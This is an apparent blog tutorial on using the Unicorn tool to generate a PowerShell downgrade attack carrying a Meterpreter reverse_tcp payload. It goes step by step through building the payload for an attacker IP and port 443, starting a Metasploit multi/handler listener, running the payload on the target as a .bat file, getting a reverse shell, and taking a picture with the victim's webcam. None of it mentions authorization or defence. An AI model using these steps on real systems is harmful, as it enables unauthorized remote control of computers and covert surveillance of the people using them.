Unicorn is a simple tool for performing a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and on the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at DEF CON 18. https://www.trustedsec.com
Welcome back. Today we will talk about PowerShell downgrade attacks using Unicorn, which injects shellcode straight into memory.
To start, we need to download Unicorn (credit to TrustedSec).
Once it is downloaded, we make the script executable:
# chmod +x unicorn.py
Now we can start Unicorn with the following command; run with no arguments it prints its usage and the payload formats it supports:
# python unicorn.py
With Unicorn working, we need to generate a payload. We use the following command, replacing the LHOST (192.168.43.49 here) with the IP address of your own attacking machine.
If you don't know your LHOST, you can use ifconfig to look up your network information.
# python unicorn.py windows/meterpreter/reverse_tcp 192.168.43.49 443
Unicorn has now successfully generated our payload. Next we set up a reverse handler to manage the connection between the attacker and the target machine. The handler must be listening before the payload runs on the target, and binding to port 443 needs root on the attacking machine.
Open up a new command terminal and load up metasploit.
Next we set our multi handler.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
Now we set the LHOST and LPORT to the same values we gave Unicorn (they must match exactly, and the payload must be the 32-bit windows/meterpreter/reverse_tcp that Unicorn was given, not the x64 variant):
msf exploit(handler) > set lhost 192.168.43.49
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit
Now we need to deliver the payload to the target machine. Simply paste the contents of powershell_attack.txt into any command prompt window, or anywhere you have the ability to call the PowerShell executable, and it will give a shell back to you. Unicorn also supports windows/download_exec as a payload method instead of just Meterpreter payloads.
Here I rename powershell_attack.txt to powershell_attack.bat and execute it on the target machine.
As you can see, we have now established a reverse shell between the attacker and the target machine.
We will now take a screenshot from the target's webcam:
meterpreter > webcam_snap
Metasploit is a powerful framework that includes lots of modules and exploits. You may also like to read: